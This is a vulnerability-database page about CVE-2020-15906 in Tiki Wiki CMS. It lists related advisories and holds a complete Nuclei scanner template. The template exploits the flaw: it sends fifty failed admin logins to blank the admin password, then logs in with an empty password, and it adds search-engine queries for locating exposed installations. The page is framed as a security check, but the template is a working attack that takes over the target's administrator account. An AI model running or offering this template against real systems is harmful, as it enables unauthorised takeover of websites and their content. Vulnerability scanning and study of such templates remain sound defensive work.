| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Tiki Authentication Bypass Vulnerability | 25 Oct 202000:00 | – | cnvd | |
| Tiki Wiki CMS Authentication Bypass (CVE-2020-15906) | 25 Nov 202000:00 | – | checkpoint_advisories | |
| CVE-2020-15906 | 22 Oct 202017:26 | – | cve | |
| CVE-2020-15906 | 22 Oct 202017:26 | – | cvelist | |
| Exploit for Improper Restriction of Excessive Authentication Attempts in Tiki | 23 Jul 202009:20 | – | githubexploit | |
| Tiki Wiki CMS Groupware 21.1 - Authentication Bypass | 21 Oct 202000:00 | – | exploitdb | |
| CVE-2020-15906 | 22 Oct 202018:15 | – | nvd | |
| Tiki Wiki CMS Groupware 21.1 Authentication Bypass | 21 Oct 202000:00 | – | packetstorm | |
| Default credentials | 22 Oct 202018:15 | – | prion | |
| PT-2020-14703 · Tiki · Tiki | 22 Oct 202000:00 | – | ptsecurity |
id: CVE-2020-15906
info:
name: Tiki Wiki CMS GroupWare - Authentication Bypass
author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu
severity: critical
description: |
tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
impact: |
Unauthenticated attackers can trigger 50 failed login attempts to reset the admin password to blank, gaining complete administrative access to the Tiki Wiki CMS and all its content.
remediation: |
Upgrade to Tiki Wiki CMS version 21.2 or later.
reference:
- https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-15906
- https://github.com/Z0fhack/Goby_POC
- https://github.com/bakery312/Vulhub-Reproduce
- https://github.com/20142995/Goby
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-15906
cwe-id: CWE-307
epss-score: 0.27362
epss-percentile: 0.97816
cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*
metadata:
vendor: tiki
product: tiki
shodan-query: title:"Tiki Wiki CMS"
fofa-query: title="Tiki Wiki CMS"
google-query: intitle:"Tiki Wiki CMS
tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass,vuln
http:
- raw:
- |
GET /tiki-login_scr.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: ticket1
internal: true
group: 1
regex:
- 'class="ticket" name="ticket" value="(.*)"'
- raw:
- |
POST /tiki-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/tiki-login_scr.php
ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
payloads:
attempt:
- nkQ0yYzgF5Er
- P5UdGflH48W3
- xFq7vKNLmhZp
- 8zKtGnh4dW5R
- CfXp2VbQz8Er
- Lh3K6vPzM9Xn
- bG4RxHpY2MdQ
- 7zNtKh3WqF5L
- Y8rQ2GpLx9Kn
- C7KzLmP5X9Vh
- v3LdX8GmQ5Kn
- W4NzX6PqL3Ft
- Q5GhY2VrX7Jk
- r9KdL4PhY6Gm
- 8XjVq5LhZ2Kr
- L5WnQ9KzY8Pr
- M2XdL5GrY9Kh
- N6YzP8WkL5Xt
- G7JqX5VbM2Kp
- H4PrX8LkY6Gm
- J5LhY2VqX9Kr
- 8GrX5NqL2KhY
- K4WnY9PzM8Xt
- Q2XkL5PrY8Vh
- 9JhL4VqX5GrM
- N2XdY5PqL9Kh
- W4LhY8KzM5Xt
- G5JqX2VrY9Kp
- H9PrL5XkY2Gm
- L8WnX5KzY9Pr
- M4XkY2LqV5Gt
- N5XdL9PqY8Kr
- P8XnL5VrY2Kh
- Q4JqX9LhY5Gr
- V7LkX5PrY2Gt
- L2WnY9KzX8Pr
- M9XdL5PqY4Kh
- N8LhY2VqX5Gr
- Q7XkL5PrY9Gm
- X4LhY8WnM5Kp
- G2JqL5VrY9Kt
- H7PrX8KzY2Gm
- J4LhY5VqX9Kr
- N9XkY2LqP5Gt
- W8LhY5PrX2Kz
- G4JqL5XkY9Vr
- P5WnY2KzL8Gt
- M7XkY9LhP2Gr
- Q2JqL5VrY8Kh
- 2JqL5VrY8Kh
attack: batteringram
threads: 50
- raw:
- |
GET /tiki-login_scr.php HTTP/1.1
Host: {{Hostname}}
- |
POST /tiki-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/tiki-login.php
ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
extractors:
- type: regex
part: body_1
name: ticket2
internal: true
group: 1
regex:
- 'class="ticket" name="ticket" value="(.*)"'
- raw:
- |
GET /tiki-index.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
part: body
words:
- "System Menu"
- "Home"
- "Search"
- "Wiki"
- "File Galleries"
- "Settings"
condition: and
- type: word
words:
- "Show on admin log-in"
- "Tiki Setup"
condition: and
# digest: 4b0a0048304602210081cb80d4856e5d2d706e51480c90afedbb156987c646f4b928ed41b2e70e0fcb022100b824594764c4da0be148b03f9c2cd0a0ca4a277d6070062b7f6366dba9f504ee:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation